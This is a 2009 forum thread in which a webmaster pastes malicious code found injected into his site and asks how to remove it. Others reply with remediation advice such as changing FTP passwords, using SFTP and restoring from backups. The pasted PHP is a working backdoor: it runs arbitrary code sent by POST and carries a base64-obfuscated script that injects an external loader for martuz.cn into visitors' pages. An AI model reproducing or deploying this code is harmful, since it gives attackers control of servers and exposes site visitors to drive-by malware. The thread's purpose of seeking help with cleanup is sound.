Infection

Discussion in 'Programming' started by pop2009, May 20, 2009.

0
  1. #1
    my site was infected with this code. I see this redirect to martuz.cn. How can I protect in future my site? for remove this it's a automatic way or I have to delete manualy from my site?
    This is the code:
    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',
    base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0g
    CihmdW5jdGlvbihnalVuayl7dmFyIGxOQTg9KCd2ITYxciEyMGEhM2QhMjJTY3J
    pcHRFITZlZ2luZSEyMiEyYyE2MiEzZCEyMiE1NiE2NSE3MnMhNjlvbigpKyEyMiEy
    YyE2YSEzZCEyMiEyMiEyY3UhM2RuYXZpZ2F0b3IhMmUhNzVzZXIhNDFnZW4h
    NzQhM2IhNjlmKCghNzUhMmVpbmRleE8hNjYhMjghMjIhNDNociE2ZiE2ZGUhMj
    IpITNjMCkhMjYhMjYodSEyZWluZGV4ITRmITY2KCEyMiE1N2luITIyKSEzZSEz
    MCEyOSEyNiEyNih1ITJlaW4hNjRleE8hNjYoITIyTiE1NCEyMDYhMjIhMjkhM2Mh
    MzApITI2ITI2KCE2NCE2ZmMhNzVtZW50ITJlY28hNmZraWUhMmVpbmQhN
    jV4TyE2NighMjJtITY5ZWshM2QxITIyKSEzYzAhMjkhMjYhMjYodHlwZSE2ZiE2N
    iEyOHpydnohNzRzITI5ITIxITNkdHlwZW9mKCEyMkEhMjIpKSkhN2IhN2FyITc2
    enQhNzMhM2QhMjIhNDEhMjIhM2JldiE2MWwhMjghMjJpITY2KHdpbmQhNmY
    hNzchMmUhMjIrITYxKyEyMikhNmEhM2RqKyEyMithKyEyMiE0ZGEhNmEhNmZ
    yITIyK2IrYSEyYiEyMk1pbm8hNzIhMjIrYiEyYiE2MSshMjJCdWlsZCEyMiEyYmIrIT
    IyaiEzYiEyMiEyOSEzYmRvY3VtZW50ITJld3JpdCE2NSghMjIhM2NzY3IhNjlwdC
    EyMHNyITYzITNkITJmITJmbWEhNzIhMjIrITIyITc0ITc1eiEyZWNuITJmdmlkITJ
    mITNmITY5ZCEzZCEyMitqITJiITIyITNlITNjITVjITJmITczY3IhNjlwdCEzZSEyMik
    hM2IhN2QnKS5yZXBsYWNlKGdqVW5rLCclJyk7dmFyIHF0VVY9dW5lc2NhcGU
    obE5BOCk7ZXZhbChxdFVWKX0pKC9cIS9nKTsKIC0tPjwvc2NyaXB0Pg=='));
     
    pop2009, May 20, 2009 IP
  2. nikes

    nikes Peon

    Messages:
    48
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.

    Then (from a clean computer) change FTP passwords.

    Try not to store them inside programs that you use to upload files to a server.

    Whenever possible use secure connections. I.e. use SFTP instead of plain FTP. Many shared hosting plans include SFTP.

    Finally, remove the malicious code from all server files (.html, .php, .js, etc.). The easiest way to do it, is replace them with clean files from a backup.
    --------------------------------------
    Tips for Clean Computer
     
    nikes, May 21, 2009 IP
  3. pop2009

    pop2009 Peon

    Messages:
    39
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #3
    thank you, nikes. can you tell me what is martuz.cn. I see my site is redirect first to martuz.cn. what martuz.cn do? steal traffic, clicks on adsense or ...?
     
    pop2009, May 21, 2009 IP